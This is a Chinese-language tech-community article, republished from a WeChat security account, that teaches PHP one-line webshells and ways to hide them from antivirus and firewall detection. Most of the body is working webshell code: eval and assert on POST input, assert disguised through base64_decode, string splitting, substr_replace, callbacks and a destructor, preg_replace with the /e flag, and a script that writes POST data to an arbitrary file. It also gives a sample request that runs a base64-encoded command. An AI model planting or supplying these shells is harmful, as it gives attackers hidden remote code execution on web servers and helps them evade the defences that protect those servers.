Loading [MathJax]/jax/output/CommonHTML/fonts/TeX/AMS-Regular.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >php一句话免杀简单学习(附赠自用免杀一句话)

php一句话免杀简单学习(附赠自用免杀一句话)

作者头像
网e渗透安全部
发布于 2023-09-01 12:56:37
发布于 2023-09-01 12:56:37
5.5K07
代码可运行
举报
文章被收录于专栏:白安全组白安全组
运行总次数:7
代码可运行

今天我们简单学习一下php的一句话木马的各种方式,通过学习这些我们可以编写出自己的免杀一句话木马。文章最后附赠免杀一句话。这里较为基础,适合新手入门学习。

基本的一句话

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
eval($_POST['haha']);
?>

使用assert加载内存

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
assert($_POST['haha']);
?>

@call_user_func把第一个参数作为回调参数使用

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
@call_user_func(assert,$_POST['haha']);
?>

这里利用substr_replace函数,这个函数啊是那个参数,意思是将第一个字符串,从第四位后面替换成中间的那个值。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
$a = substr_replace("assexx","rt",4);
$a($_POST['haha']);
?>

利用function函数调用变量a,然后下面给fun1中的变量a赋值assert

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
function fun1($a){
    $a($_POST['haha']);
}
fun1(assert);
?>

方式同上,这里是将post赋值给a

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
function fun1($a){
    assert($a);
}
fun1($_POST['haha']);
?>

换行拼接法

$_REQUEST会将值传递过去,下面使用b和a拼接放到eval中,这里的b的值相当于换行执行。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
$a = $_REQUEST['haha'];
$b = "\n";
eval($b.=$a);
?>

面向对象法

这里使用面向对象的一种方式设置obj为一个实例对象,然后对象会赋值a一个post

这里使用public匿名生成一个$a,在下面function__destruct中面向对象赋值给a

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
class me{
    public $a = '';
    function __destruct()
{
        assert("$this->a");
    }
}
$obj = new me;
$obj->a = $_POST['haha'];
?>

base64加密法

这里将关键的值使用了base64加密,然后放到里面将解密的值赋值给$a,然后a和后面post拼接执行。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
$a = base64_decode("YXNzZXJ0");
$a($_POST['haha']);
?>

字符分割法

这里将所有的字符分开,然后通过$c结合最后拼接post

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
$a = "a"."s"."s";
$b = "e"."r"."t";
$c = $a.$b;
$c($_POST['haha']);
?>

这里利用一个正则表达式的方式使用@preg_replace函数,该函数里面有三个内容,第一个是搜索模式,第二个是用于替换的字符串,然后是要搜索替换的目标,效果相当于匹配到nihao,将fun的内容拼接到nihao 后面,前面的正则中/e意思是匹配到带入后立即执行。仅适用php7以下

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
function fun(){
    return $_POST['haha'];
}
@preg_replace("/nihao/e",fun(),"nihao woshi zj");
?>

这里属于中介执行,通过读取一个外部传递的文件,然后data的变量,给他赋值post,下面

然后下面我们就可以使用fwrite对一个打开的文件data。后面?是做一个判断,成功返回success,失败返回fail

最后关闭打开的文件$fp

这样我们就可以设置一个文件名写入一个内容。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
if(isset($_POST['file'])){
    $d = 'data';
    $$d = $_POST['haha'];//$data
    $f = 'fp';
    $$f = fopen($_POST['file'],'wb');//$fp
    echo fwrite($fp,$data)?'save success':'save fail';
    fclose($fp);
}
?>

正则表达式一句话木马

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php

$a = $_POST['haha'];
if(isset($a)){
    @preg_replace("/\[(.*)\]/e",'\\1','[@eval(base64_decode($_POST[z0]));]');
}

?>

此时\\1为@eval(base64_decode($_POST[z0]));

haha=1&z0=cGhwaW5mbygpOw

这里phpinfo进行一个base64加密传输过去

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-03-09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
webshell免杀——以PHP为例
凡是使用webshell时,免杀都是需要考虑的事情,说白了就是我的webshell得能用啊!故本篇做一个webshell免杀的学习,主要是php的一句话
中龙技术
2022/09/29
2.9K0
webshell免杀——以PHP为例
php 一句话木马简介
一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
全栈程序员站长
2022/08/26
3.2K0
php 一句话木马简介
php一句话木马变形技巧
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。
全栈程序员站长
2022/08/31
4.5K0
php一句话木马变形技巧
PHP木马免杀的一些总结
这篇文章写一些php木马免杀的一些技巧,希望对大家有点帮助。这里解释一下什么是php木马,这里大体分为三种:
雪痕@
2020/09/27
2.8K0
PHP木马免杀的一些总结
webshell变形记之一
虽然进行了变形,但是还是被检测出来了4级,这个变形也是比较鸡肋,所以可以配合其他的php函数进行变形
vFREE
2022/08/08
1.1K0
一句话木马
“一句话木马”短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用,居家生活搞站越货必备神器。
用户3376177
2018/09/21
2K0
聊聊一句话木马
木马是什么意思就不用我介绍了,网站通常在渗透中找到可以操作文件的机会使用时候,和代码执行文件上传漏洞息息相关,在网站中获得种种上了木马,我们就说拿到了webshell,获得一个较低的权限,网站木马通常是入侵者入侵者拿到网站权限的标志,也是内网渗透.权限提升的开始,一般有两种网站木马,俗称小马和大马,小马又称一句话木马,以只有一句代码,功能简单而得名,大马往往有文件操作,数据操作,执行命令等复杂的功能,在渗透的过程中配合大小木马交叉使用,非常强大,这里和大家简单聊聊我见过的木马。
用户5878089
2019/07/25
1.8K0
PHP WebShell
404页面是网站常用的文件,一般建立好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。
Al1ex
2021/08/13
2.2K0
PHP一句话木马后门
在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器。
全栈程序员站长
2022/08/31
3.4K0
一句话木马的各种变形
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马一直在跟杀软斗智斗勇,出现一种,杀软秒更新规则。木马再变形,再被杀。。。出现
洛米唯熊
2019/07/22
4.9K0
webshell多种免杀技巧和思路总结
webshell这个东西对于web方向的还是极其重要的,getshell被杀了很难受,于是来研究一波自己的免杀马儿,毕竟别人没有自己的好用,而且分享出来分分钟被杀。
网络安全自修室
2021/11/25
1.7K0
webshell多种免杀技巧和思路总结
分享一些比较强悍的PHP木马大全-源码
由于PHP一句话木马可以说有很多,简单的、中等的、复杂的.......,今天主要是分享一些比较强悍的一些PHP一句话木马大全;
程序猿的栖息地
2022/04/29
5.8K0
分享一些比较强悍的PHP木马大全-源码
php一句话木马深度解析
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。我们可以利用一句话木马来对主机进行渗透操作,最常见的工具就是号称黑客之刃的中国菜刀。这里我们主要讲解php一句话木马,因为别的语言我也不会啊。
用砖头敲代码
2022/06/06
4K0
深入浅出玩转php一句话(含过waf新姿势)
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/143614.html原文链接:https://javaforall.cn
全栈程序员站长
2022/08/31
7590
Wellshell一句话木马
何为一句话木马?他跟其他木马有什么区别吗? 一句话木马的叫法是来自他代码结构简单,简单到什么地步?最简单的一句话木马甚至可以就一句代码就结束了,比如经典PHP一句话:<?php @eval($_POS
Tommonkey
2023/03/20
2.7K0
eval与php一句话的关系
||作者:抹布 part1 首先我们知道,eval能执行php代码,最常见的php一句话也是用eval关键字的。 <?php @eval($_GET["code"])?> Part2 在论坛学习的时候
随心助手
2019/10/15
1.5K0
eval与php一句话的关系
一句话木马踩坑记
所以我在怀疑,有些大佬们都是照抄assert的变形方式没有测试过就放到博客上了就是说,如果换了assert,这个是可以用的
用户5878089
2019/11/07
1.8K0
PHP常见过WAF webshell及最简单检测方法
在那篇文章中我突然想到一种检测webshell的方法,就是首先获取到当前文件中的所有变量(不明白的可以先去看下之前的文章),然后再根据正则库进行静态检测。
瓦都剋
2020/08/07
1.5K0
PHP常见过WAF webshell及最简单检测方法
如何优雅地隐藏你的Webshell
拿下一个站后总希望自己的后门能够很隐蔽!不让网站管理员或者其他的Hacker发现,网上关于隐藏后门的方法也很多,如加密、包含,解析漏洞、加隐藏系统属性等等,但大部分已经都不实用了,随便找一个查马的程序就能很快的查出来,下面分享我总结的一些经验:
FB客服
2021/03/09
1.5K0
如何优雅地隐藏你的Webshell
创造tips的秘籍——PHP回调后门
最近很多人分享一些过狗过盾的一句话,但无非是用各种方法去构造一些动态函数,比如_GET['func'](_REQUEST['pass'])之类的方法。万变不离其宗,但这种方法,虽然狗盾可能看不出来,但人肉眼其实很容易发现这类后门的。
phith0n
2020/10/15
2.1K0
相关推荐
webshell免杀——以PHP为例
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验